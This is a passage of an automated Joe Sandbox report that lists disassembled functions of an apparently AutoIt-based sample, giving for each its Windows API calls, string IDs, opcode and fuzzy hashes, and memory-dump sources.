                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$DestroyMove
                                                      • String ID: static
                                                      • API String ID: 2139405536-2160076837
                                                      • Opcode ID: bb500713e74b4eb21d20d9f622ccd552b61f91061547eb02ad2e5f514f4fcc98
                                                      • Instruction ID: c72f5ec03566a0250589b92b43dc7083d8c8a9d7964f5a23b4c7b8d15a8e6d30
                                                      • Opcode Fuzzy Hash: bb500713e74b4eb21d20d9f622ccd552b61f91061547eb02ad2e5f514f4fcc98
                                                      • Instruction Fuzzy Hash: 6C317E71110204AADB24DF78D841FFB73A9FF48714F10A61DF965A7280DA32AD92DB60
                                                      Function 00EC4537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00EC461F
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00EC4634
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: '
                                                      • API String ID: 3850602802-1997036262
                                                      • Opcode ID: 023acf1d8da5d628a9720a08b7684db7db1083621c4291dc2c6ea21c98d7d748
                                                      • Instruction ID: d4b7c57304c4bf1c24cf48ae52a29ca9e4c17838f90c25101738cc380e167d00
                                                      • Opcode Fuzzy Hash: 023acf1d8da5d628a9720a08b7684db7db1083621c4291dc2c6ea21c98d7d748
                                                      • Instruction Fuzzy Hash: 083128B5A002099FDB14CF69CA90FDA7BB5FF09304F14506AE904AB381D771A942CF90
                                                      Function 00EC31EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00EC327C
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00EC3287
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: Combobox
                                                      • API String ID: 3850602802-2096851135
                                                      • Opcode ID: d8365d79c12931bbe8f07d46f2f83e815a707983b8f63088a35306a27e9f707a
                                                      • Instruction ID: 86d7f4c540ac9449d1b04ca6646b6a1c98f99779d3db50858ade29689f1ffc40
                                                      • Opcode Fuzzy Hash: d8365d79c12931bbe8f07d46f2f83e815a707983b8f63088a35306a27e9f707a
                                                      • Instruction Fuzzy Hash: A711E6713002087FEF299F64DD80FBB37ABEB54368F109128F518B72A0D6329D528760
                                                      Function 00EC3710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E3600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00E3604C
                                                        • Part of subcall function 00E3600E: GetStockObject.GDI32(00000011), ref: 00E36060
                                                        • Part of subcall function 00E3600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 00E3606A
                                                      • GetWindowRect.USER32(00000000,?), ref: 00EC377A
                                                      • GetSysColor.USER32(00000012), ref: 00EC3794
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: 51795df9eb34ce6d92d2bff03b1ef3535d732725c9e5dedd2595926db0537ca4
                                                      • Instruction ID: 7c9cb8b426250ea4b8c2f95c05211c8efcfdca6506f2d14a4a2aa2e3acc16f8b
                                                      • Opcode Fuzzy Hash: 51795df9eb34ce6d92d2bff03b1ef3535d732725c9e5dedd2595926db0537ca4
                                                      • Instruction Fuzzy Hash: 4C1159B2610209AFDF00DFB8CD4AEEA7BF8FB08314F005929F955E2250D736E8129B50
                                                      Function 00EACD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00EACD7D
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00EACDA6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: 01b0524aef5b8358d1d6c30b9fad5c5d4a0d25862da57db8c9666d8431d8cdeb
                                                      • Instruction ID: 897f6feefc8fef0901e0c541c10cf798a75ed1969042068ffa969a45a698e02c
                                                      • Opcode Fuzzy Hash: 01b0524aef5b8358d1d6c30b9fad5c5d4a0d25862da57db8c9666d8431d8cdeb
                                                      • Instruction Fuzzy Hash: DE1106712016357AD7344B668C44EF3BE6CEF177A8F205236B109A7180D370A841D6F0
                                                      Function 00EC3429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowTextLengthW.USER32(00000000), ref: 00EC34AB
                                                      • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00EC34BA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LengthMessageSendTextWindow
                                                      • String ID: edit
                                                      • API String ID: 2978978980-2167791130
                                                      • Opcode ID: f636cabec5a53c5a2ed925953193762d266ee2dc940d76779fa03d2b5550818b
                                                      • Instruction ID: c9e35552bf4ea021d85c5e63ab991bf16786af5dc64ab0e4f1d4b275d32c3792
                                                      • Opcode Fuzzy Hash: f636cabec5a53c5a2ed925953193762d266ee2dc940d76779fa03d2b5550818b
                                                      • Instruction Fuzzy Hash: C2115B71100208AAEB254E74DE44FEA37AAFB05778F60A328F975A31D0C672DD529B50
                                                      Function 00E96C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                      • CharUpperBuffW.USER32(?,?,?), ref: 00E96CB6
                                                      • _wcslen.LIBCMT ref: 00E96CC2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen$BuffCharUpper
                                                      • String ID: STOP
                                                      • API String ID: 1256254125-2411985666
                                                      • Opcode ID: e1465e2e53c446f5fadcf71948945eef435547966edda075c0d88ce0defe578b
                                                      • Instruction ID: cfe0e90be082e2a56da29d74806d7d3fa120380acd3a41d2719eee8710a3513f
                                                      • Opcode Fuzzy Hash: e1465e2e53c446f5fadcf71948945eef435547966edda075c0d88ce0defe578b
                                                      • Instruction Fuzzy Hash: D20108326005268ACF11AFBDDC419BF77F4EB60714B102936F862B2191EB31D840C650
                                                      Function 00E91CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00E93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E93CCA
                                                      • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E91D4C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: 39960adf25e064b1821d48b6de4fcca5f1062b5f89df1b95c6c6873265c7a149
                                                      • Instruction ID: 71b2bd23867135bdcfc13af0cb21866e2a3868583a5f7a1c8d5b8b0990c0b2c2
                                                      • Opcode Fuzzy Hash: 39960adf25e064b1821d48b6de4fcca5f1062b5f89df1b95c6c6873265c7a149
                                                      • Instruction Fuzzy Hash: 75012431600219AB8F08EBA0CC15CFEB7A8EF52390F102A19F822773C2EB705908C660
                                                      Function 00E91BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00E93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E93CCA
                                                      • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E91C46
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: 3e79f4930ecb1634ab4639356beb59f8a0747cda4c7bc8c378e6fe6aad81857d
                                                      • Instruction ID: b8f57607c6bc06d810ac61e3e9ce9bebaa044fcb3115506dbf18fed90dfed8da
                                                      • Opcode Fuzzy Hash: 3e79f4930ecb1634ab4639356beb59f8a0747cda4c7bc8c378e6fe6aad81857d
                                                      • Instruction Fuzzy Hash: 3101F7716842097ACF08EBA0CA55EFFB7E89F51340F102019B90673282EA609E08C6B1
                                                      Function 00E91C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00E93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E93CCA
                                                      • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E91CC8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: a8134e94be911af5bcedb2146eafdb267f085a6d28a1ae39a5762538ae11a986
                                                      • Instruction ID: f6c6f26a369cc1fe321882f91d72c15a109be11f9f9b3143245501ff3e38e451
                                                      • Opcode Fuzzy Hash: a8134e94be911af5bcedb2146eafdb267f085a6d28a1ae39a5762538ae11a986
                                                      • Instruction Fuzzy Hash: 6301D67568021977CF18EBA0CA05EFEF7E89B11340F642015B902B3282EAA19F08C672
                                                      Function 00E91D68 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E39CB3: _wcslen.LIBCMT ref: 00E39CBD
                                                        • Part of subcall function 00E93CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00E93CCA
                                                      • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 00E91DD3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: ClassMessageNameSend_wcslen
                                                      • String ID: ComboBox$ListBox
                                                      • API String ID: 624084870-1403004172
                                                      • Opcode ID: 18ff3c3c08934cefa5f005219832d3015be145dff673feafebbde7a6f568268d
                                                      • Instruction ID: 21429a245a0a6c21a5e94239fb2a71af308796b6484b4d3e7bd6ff149c9adc59
                                                      • Opcode Fuzzy Hash: 18ff3c3c08934cefa5f005219832d3015be145dff673feafebbde7a6f568268d
                                                      • Instruction Fuzzy Hash: 41F0F471A4031966CF08E7A4CD56EFEBBA8AB01340F142915F922B32C2DBA05908C260
                                                      Function 00EB747E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: _wcslen
                                                      • String ID: 3, 3, 16, 1
                                                      • API String ID: 176396367-3042988571
                                                      • Opcode ID: e0161d8691f93e112afc685d47b2f0fc2fee84cf820f821ccbe663070f9dc364
                                                      • Instruction ID: 0a6704b582cd85f9c8bbe51b8b3ab7ca4431a176878685453b400f444ea6eea9
                                                      • Opcode Fuzzy Hash: e0161d8691f93e112afc685d47b2f0fc2fee84cf820f821ccbe663070f9dc364
                                                      • Instruction Fuzzy Hash: A2E02B5260532120933112799CC29BF5AC9CFC57567103C2BFDD1F22A6EA948DD193A0
                                                      Function 00E90B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E90B23
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Message
                                                      • String ID: AutoIt$Error allocating memory.
                                                      • API String ID: 2030045667-4017498283
                                                      • Opcode ID: c7f1e81079d5f6558108c00e75aadcfe27a9a938d0e7fe701478b0794c2c4f29
                                                      • Instruction ID: 51924ae27c125ebe0112d7ab50e63363ba615135d7fc187ba699333b6aa1a2d2
                                                      • Opcode Fuzzy Hash: c7f1e81079d5f6558108c00e75aadcfe27a9a938d0e7fe701478b0794c2c4f29
                                                      • Instruction Fuzzy Hash: 69E048322443183AD21436557D07FC97AC48F45F65F20642BFB9C755C38AE2649156A9
                                                      Function 00E50D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00E4F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00E50D71,?,?,?,00E3100A), ref: 00E4F7CE
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,00E3100A), ref: 00E50D75
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00E3100A), ref: 00E50D84
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E50D7F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 55579361-631824599
                                                      • Opcode ID: 3b67903e7414bbe3ae9282140488b501afced516580c761c9f0a1658a26f9d6b
                                                      • Instruction ID: 542baa9c27e320ce448c3d80526dfd952d5fa99b2ebaabb668742b5dab82c29c
                                                      • Opcode Fuzzy Hash: 3b67903e7414bbe3ae9282140488b501afced516580c761c9f0a1658a26f9d6b
                                                      • Instruction Fuzzy Hash: 13E06D702007418FD3249FB9E508B427BF1BF00745F005D2DF886E6661DBB6E4498B91
                                                      Function 00EA3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00EA302F
                                                      • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00EA3044
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: Temp$FileNamePath
                                                      • String ID: aut
                                                      • API String ID: 3285503233-3010740371
                                                      • Opcode ID: 5441a65b32a478037ca8cc81946ac44cf8410cf7d9e2c1e326ede3efa09f640b
                                                      • Instruction ID: 0352ae56872eb3a32d438b4b77908c616eaf9ccb23681b213e6f9e9ae7764f68
                                                      • Opcode Fuzzy Hash: 5441a65b32a478037ca8cc81946ac44cf8410cf7d9e2c1e326ede3efa09f640b
                                                      • Instruction Fuzzy Hash: 5ED05B71500318ABDA20D7A59C0DFD73A6CD704750F000161BA55F20A1DAB19545CAD0
                                                      Function 00E8D21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: LocalTime
                                                      • String ID: %.3d$X64
                                                      • API String ID: 481472006-1077770165
                                                      • Opcode ID: 80b567d154d497b0cfa691ba3c3f9fe59936e74b1fbd64ef54baff854657116c
                                                      • Instruction ID: e3455203406c55d858182c508ee68caad179110d2e9e50033fba14dc72b60f98
                                                      • Opcode Fuzzy Hash: 80b567d154d497b0cfa691ba3c3f9fe59936e74b1fbd64ef54baff854657116c
                                                      • Instruction Fuzzy Hash: BCD0126184D108F9CB50A6D0DC49CF9B3BCEB08301F60A462F90EB2090E634C5086761
                                                      Function 00EC2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00EC236C
                                                      • PostMessageW.USER32(00000000), ref: 00EC2373
                                                        • Part of subcall function 00E9E97B: Sleep.KERNEL32 ref: 00E9E9F3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2158466681.0000000000E31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                                                      • Associated: 00000000.00000002.2158444161.0000000000E30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000ECC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158526088.0000000000EF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158583840.0000000000EFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2158623477.0000000000F04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_e30000_1001-13.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 709fcd496c4412612b4c859c0b0d3f2232a72271dfedcf4d822cb4157626de11
                                                      • Instruction ID: a66ccbdce016a681e250587143a4c7c7a2a16fcea8a4f51ddc081426732137ad
